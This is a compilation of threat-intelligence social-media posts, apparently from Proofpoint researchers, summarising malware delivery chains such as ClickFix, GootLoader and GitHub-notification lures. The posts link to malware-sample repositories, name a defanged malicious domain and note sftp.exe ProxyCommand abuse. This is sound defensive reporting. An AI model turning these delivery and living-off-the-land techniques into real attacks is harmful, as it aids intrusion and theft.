When the ecrime gang finds something… else If you like weird infection chains, WebDAV, Python, custom backdoors with novel C2 methods, and use of Dumpulator, PCAPs, and more, the gang @selenalarson Myrtus Tommy M (TheAnalyst) got you covered! proofpoint.com/us/blog/threat…

Proofpoint researchers Tommy Madjar (Tommy M (TheAnalyst)), Pim Trouerbach (Myrtus) & Selena Larson (@selenalarson) look into a suspected espionage campaign delivering the Voldemort backdoor. proofpoint.com/us/blog/threat…

New security brief out by me and @selenalarson and the rest of the Proofpoint Threat Insight team. This is a really interesting chain leading to the use of open-source Prince Ransomware used as first stage malware, likely meant to be a destructive attack. proofpoint.com/us/blog/threat…

Threat actors are impersonating the British postal carrier Royal Mail in an attempt to deliver Prince #ransomware. In the small campaign, most messages appear to come from contact forms posted on the target organizations’ websites. Details in our blog: ow.ly/XLY150TAZFF.

Proofpoint researchers have identified an increase in the #socialengineering technique called #ClickFix. The technique is being used by financially motivated threat actors and reportedly by suspected espionage-focused groups. Read the security brief: ow.ly/WYXX50U9eZq.

Proofpoint has tracked this technique since August 2024, and call it “brooxml”. Our researchers do not consider this a zero-day or vulnerability in general. We’ve released Emerging Threats and YARA signatures at the end of this thread.

Also saw sftp.exe in a similar chain which also support ProxyCommand= which isn't in the #lolbas project. This #Emmenhtal/#PEAKLIGHT style chain did instead lead to #SectopRAT.

PDF > URL > Filtering > #ClickFix > HTA > #DOILoader /#IDATLoader > #Lumma > #NetSupport Example PDFs: virustotal.com/gui/url/b55903… Payload URLs: urlhaus.abuse.ch/browse/tag/Ita… All stages: bazaar.abuse.ch/browse/tag/Ita… Calling this #ItalianPasta b/c staging domain text for JAMESWT_MHT 🇮🇹🍝 🤣

⚠️ New TTPs detected for #Gootloader ⚠️ Out are the PDF conversions and back in are legal document lurs. They are still using #malvertising, not SEO poisoning. 📝Full analysis: gootloader.wordpress.com/2025/03/31/goo…

Proofpoint also recently observed this activity delivering #GootLoader. Google Ads for a fake document creation app (lawliner[.]com) led to a malicious document creation website, on which users are directed to enter their email address.

New e-crime insights: TA4557, known for distributing More_eggs malware, notably expanded to an int'l audience in recent campaigns. Per our data, the recruiter-focused TA was seen targeting orgs in France, England & Ireland, in addition to typical North America-targeted threats.

Proofpoint Threat Insight identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys. We first spotted this post by ANY.RUN about ClickFix delivering Rhadamanthys and began investigating. 🔍

We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts who receive notifications that they

The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to

Threat actors continue to abuse GitHub to deliver malware, this time: #LummaStealer. We identified GitHub notification emails that kick off the attack chain. Messages are sent when the threat actor, using an actor-controlled account, comments on existing GitHub issues. 🧵

Since 14 Oct., we’ve tracked a high volume XWorm campaign targeting Germany. The activity is attributed to TA584, a sophisticated #cybercrime group tracked since 2020. Messages are sent from hundreds of compromised sender accounts impersonating ELSTER and contain malicious URLs.

Remote access, real cargo: cybercriminals targeting trucking and logistics | Proofpoint US #cybercrime #shipping #cargo #freight #trucking #rmm #fleetdeck #logmein #nable #pdqconnect #screenconnect #simplehelp proofpoint.com/us/blog/threat…

Proofpoint is proud to have assisted law enforcement in the #OperationEndgame investigation that led to the Nov. 13, 2025 disruption of #Rhadamanthys and #VenomRAT—#malware used by multiple cybercriminals. Rhadamanthys: brnw.ch/21wXsCc VenomRAT: brnw.ch/21wXsCd